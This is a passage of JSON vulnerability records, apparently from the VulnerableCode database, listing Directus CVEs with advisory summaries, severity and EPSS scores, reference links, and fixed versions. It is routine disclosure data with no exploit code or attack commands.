"vulnerability": "VCID-pvfa-xp3e-8kg2" }, { "vulnerability": "VCID-qeh1-cm33-93g1" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-qrf3-cz1h-8kau" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-s39d-aw92-hydh" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u121-7x5t-3fcg" }, { "vulnerability": "VCID-u4er-eddz-g7aq" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ua8h-tmak-hufd" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v2je-s9mk-e3h1" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.7.0" } ], "aliases": [ "CVE-2022-26969", "GHSA-g27j-74fp-xfpr", "GMS-2022-677" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-8ch7-zwuu-zufp" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/71947?format=api", "vulnerability_id": "VCID-9dsr-kz3s-hkdx", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.16.1, when GRAPHQL_INTROSPECTION=false is configured, Directus correctly blocks standard GraphQL introspection queries (__schema, __type). However, the server_specs_graphql resolver on the /graphql/system endpoint returns an equivalent SDL representation of the schema and was not subject to the same restriction. This allowed the introspection control to be bypassed, exposing schema structure (collection names, field names, types, and relationships) to unauthenticated users at the public permission level, and to authenticated users at their permitted permission level. 
This vulnerability is fixed in 11.16.1.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35413", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04912", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04908", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05294", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05303", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35413" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35413", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35413" }, { "reference_url": "https://github.com/advisories/GHSA-wxwm-3fxv-mrvx", "reference_id": "GHSA-wxwm-3fxv-mrvx", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-wxwm-3fxv-mrvx" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-wxwm-3fxv-mrvx", "reference_id": "GHSA-wxwm-3fxv-mrvx", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": 
"cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-08T14:05:28Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-wxwm-3fxv-mrvx" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373399?format=api", "purl": "pkg:npm/directus@11.16.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.16.1" } ], "aliases": [ "CVE-2026-35413", "GHSA-wxwm-3fxv-mrvx" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9dsr-kz3s-hkdx" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/105805?format=api", "vulnerability_id": "VCID-9r91-qgfa-x7ak", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Starting in version 9.12.0 and prior to version 11.9.0, Directus Flows with a manual trigger are not validating whether the user triggering the Flow has permissions to the items provided as payload to the Flow. Depending on what the Flow is set up to do this can lead to the Flow executing potential tasks on the attacker's behalf without authenticating. Bad actors could execute the manual trigger Flows without authentication, or access rights to the said collection(s) or item(s). 
Users with manual trigger Flows configured are impacted as these endpoints do not currently validate if the user has read access to `directus_flows` or to the relevant collection/items. The manual trigger Flows should have tighter security requirements as compared to webhook Flows where users are expected to perform their own checks. Version 11.9.0 fixes the issue. As a workaround, implement permission checks for read access to Flows and read access to relevant collection/items.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-53889", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00244", "scoring_system": "epss", "scoring_elements": "0.47989", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00244", "scoring_system": "epss", "scoring_elements": "0.48128", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00244", "scoring_system": "epss", "scoring_elements": "0.48144", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-53889" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53889", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53889" }, { "reference_url": "https://github.com/directus/directus/commit/22be460c76957708d67fdd52846a9ad1cbb083fb", "reference_id": "22be460c76957708d67fdd52846a9ad1cbb083fb", 
"reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:43:29Z/" } ], "url": "https://github.com/directus/directus/commit/22be460c76957708d67fdd52846a9ad1cbb083fb" }, { "reference_url": "https://github.com/advisories/GHSA-7cvf-pxgp-42fc", "reference_id": "GHSA-7cvf-pxgp-42fc", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-7cvf-pxgp-42fc" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-7cvf-pxgp-42fc", "reference_id": "GHSA-7cvf-pxgp-42fc", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:43:29Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-7cvf-pxgp-42fc" }, { "reference_url": "https://github.com/directus/directus/releases/tag/v11.9.0", "reference_id": "v11.9.0", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:43:29Z/" } ], "url": "https://github.com/directus/directus/releases/tag/v11.9.0" } ], "fixed_packages": [ 
{ "url": "http://public2.vulnerablecode.io/api/packages/378353?format=api", "purl": "pkg:npm/directus@11.9.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-8q3p-rrv2-jba5" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.9.0" } ], "aliases": [ "CVE-2025-53889", "GHSA-7cvf-pxgp-42fc" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9r91-qgfa-x7ak" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/145589?format=api", "vulnerability_id": "VCID-9t8b-59vc-kbea", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. In versions prior to 9.16.0 users with read access to the `password` field in `directus_users` can extract the argon2 password hashes by brute forcing the export functionality combined with a `_starts_with` filter. This allows the user to enumerate the password hashes. Accounts cannot be taken over unless the hashes can be reversed which is unlikely with current hardware. 
This problem has been patched by preventing any hashed/concealed field to be filtered against with the `_starts_with` or other string operator in version 9.16.0. Users are advised to upgrade. Users unable to upgrade may mitigate this issue by ensuring that no user has `read` access to the `password` field in `directus_users`.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-27481", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00301", "scoring_system": "epss", "scoring_elements": "0.53838", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00301", "scoring_system": "epss", "scoring_elements": "0.53967", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00301", "scoring_system": "epss", "scoring_elements": "0.53964", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00301", "scoring_system": "epss", "scoring_elements": "0.53981", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-27481" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-27481", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-27481" }, { "reference_url": "https://github.com/directus/directus/pull/14829", "reference_id": "14829", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": 
"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:10Z/" } ], "url": "https://github.com/directus/directus/pull/14829" }, { "reference_url": "https://github.com/directus/directus/pull/15010", "reference_id": "15010", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:10Z/" } ], "url": "https://github.com/directus/directus/pull/15010" }, { "reference_url": "https://github.com/advisories/GHSA-m5q3-8wgf-x8xf", "reference_id": "GHSA-m5q3-8wgf-x8xf", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-m5q3-8wgf-x8xf" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-m5q3-8wgf-x8xf", "reference_id": "GHSA-m5q3-8wgf-x8xf", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", 
"scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:10Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-m5q3-8wgf-x8xf" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/381015?format=api", "purl": "pkg:npm/directus@9.16.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-54ja-4vrx-tbgm" }, { "vulnerability": "VCID-79ch-vtkp-q3cd" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-b8ya-2bmn-e3h5" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-bsua-aktm-1qfd" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-eyv5-91cq-pyf9" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-gf4m-ad8j-7bbn" }, { "vulnerability": "VCID-jvtg-cnnb-7ubg" }, { "vulnerability": "VCID-jy2x-jbbb-zua5" }, { "vulnerability": "VCID-pvfa-xp3e-8kg2" }, { "vulnerability": "VCID-qeh1-cm33-93g1" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-qrf3-cz1h-8kau" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-s39d-aw92-hydh" }, { "vulnerability": "VCID-snux-8b2e-9kd6" }, { "vulnerability": "VCID-t1by-h5au-rqbu" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u121-7x5t-3fcg" }, { "vulnerability": "VCID-u4er-eddz-g7aq" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ua8h-tmak-hufd" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v2je-s9mk-e3h1" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { 
"vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.16.0" } ], "aliases": [ "CVE-2023-27481", "GHSA-m5q3-8wgf-x8xf" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9t8b-59vc-kbea" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/73167?format=api", "vulnerability_id": "VCID-a1y7-cmk1-4ffn", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.17.0, the PATCH /files/{id} endpoint accepts a user-controlled filename_disk parameter. By setting this value to match the storage path of another user's file, an attacker can overwrite that file's content while manipulating metadata fields such as uploaded_by to obscure the tampering. This vulnerability is fixed in 11.17.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39942", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0004", "scoring_system": "epss", "scoring_elements": "0.12364", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.0004", "scoring_system": "epss", "scoring_elements": "0.12342", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.0004", "scoring_system": "epss", "scoring_elements": "0.12266", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.0004", "scoring_system": "epss", "scoring_elements": "0.12358", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39942" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": 
"" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39942", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39942" }, { "reference_url": "https://github.com/advisories/GHSA-393c-p46r-7c95", "reference_id": "GHSA-393c-p46r-7c95", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-393c-p46r-7c95" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-393c-p46r-7c95", "reference_id": "GHSA-393c-p46r-7c95", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-09T17:47:33Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-393c-p46r-7c95" }, { "reference_url": "https://github.com/directus/directus/releases/tag/v11.17.0", "reference_id": "v11.17.0", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-09T17:47:33Z/" } ], "url": "https://github.com/directus/directus/releases/tag/v11.17.0" } ], "fixed_packages": [ { "url": 
"http://public2.vulnerablecode.io/api/packages/373752?format=api", "purl": "pkg:npm/directus@11.17.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.17.0" } ], "aliases": [ "CVE-2026-39942", "GHSA-393c-p46r-7c95" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-a1y7-cmk1-4ffn" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/71560?format=api", "vulnerability_id": "VCID-ah8z-vr21-wfd6", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.16.0, a Server-Side Request Forgery (SSRF) protection bypass has been identified and fixed in Directus. The IP address validation mechanism used to block requests to local and private networks could be circumvented using IPv4-Mapped IPv6 address notation. This vulnerability is fixed in 11.16.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35409", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02707", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02712", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.0398", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.03969", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35409" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", 
"scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35409", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35409" }, { "reference_url": "https://github.com/advisories/GHSA-wv3h-5fx7-966h", "reference_id": "GHSA-wv3h-5fx7-966h", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-wv3h-5fx7-966h" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-wv3h-5fx7-966h", "reference_id": "GHSA-wv3h-5fx7-966h", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-08T14:04:19Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-wv3h-5fx7-966h" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373510?format=api", "purl": "pkg:npm/directus@11.16.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": 
"VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.16.0" } ], "aliases": [ "CVE-2026-35409", "GHSA-wv3h-5fx7-966h" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ah8z-vr21-wfd6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/134660?format=api", "vulnerability_id": "VCID-b8ya-2bmn-e3h5", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to version 9.23.3, the `directus_refresh_token` is not redacted properly from the log outputs and can be used to impersonate users without their permission. This issue is patched in version 9.23.3.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-28443", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00061", "scoring_system": "epss", "scoring_elements": "0.19287", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00061", "scoring_system": "epss", "scoring_elements": "0.19453", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00061", "scoring_system": "epss", "scoring_elements": "0.19457", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00061", "scoring_system": "epss", "scoring_elements": "0.19477", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-28443" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-28443", "reference_id": "", "reference_type": "", "scores": [ { 
"value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-28443" }, { "reference_url": "https://github.com/directus/directus/commit/349536303983ccba68ecb3e4fb35315424011afc", "reference_id": "349536303983ccba68ecb3e4fb35315424011afc", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-21T15:28:44Z/" } ], "url": "https://github.com/directus/directus/commit/349536303983ccba68ecb3e4fb35315424011afc" }, { "reference_url": "https://github.com/advisories/GHSA-8vg2-wf3q-mwv7", "reference_id": "GHSA-8vg2-wf3q-mwv7", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-8vg2-wf3q-mwv7" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-8vg2-wf3q-mwv7", "reference_id": "GHSA-8vg2-wf3q-mwv7", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": 